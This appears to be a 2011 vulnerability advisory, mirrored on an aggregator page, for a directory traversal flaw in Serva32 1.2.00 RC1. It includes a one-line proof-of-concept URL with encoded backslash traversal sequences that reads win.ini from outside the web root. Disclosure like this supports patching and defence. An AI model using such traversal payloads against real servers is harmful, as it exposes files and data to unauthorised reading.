Serva32 1.2.00 RC1 Directory Traversal

🗓️ 09 May 2011 00:00:00Reported by AutoSec ToolsType

packetstorm🔗 packetstormsecurity.com👁 22 Views

Serva32 1.2.00 RC1 Directory Traversal vulnerability allows reading files outside web roo

`------------------------------------------------------------------------  
Software................Serva32 1.2.00 RC1  
Vulnerability...........Directory Traversal  
Threat Level............Serious (3/5)  
Download................http://www.vercot.com/~serva/  
Discovery Date..........5/7/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <[email protected]>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A directory traversal vulnerability in Serva32 1.2.00 RC1 can be  
exploited to read files outside of the web root.  
  
  
--PoC--  
  
http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows/win.ini  
`

09 May 2011 00:00Current

0.1Low risk

Vulners AI Score0.1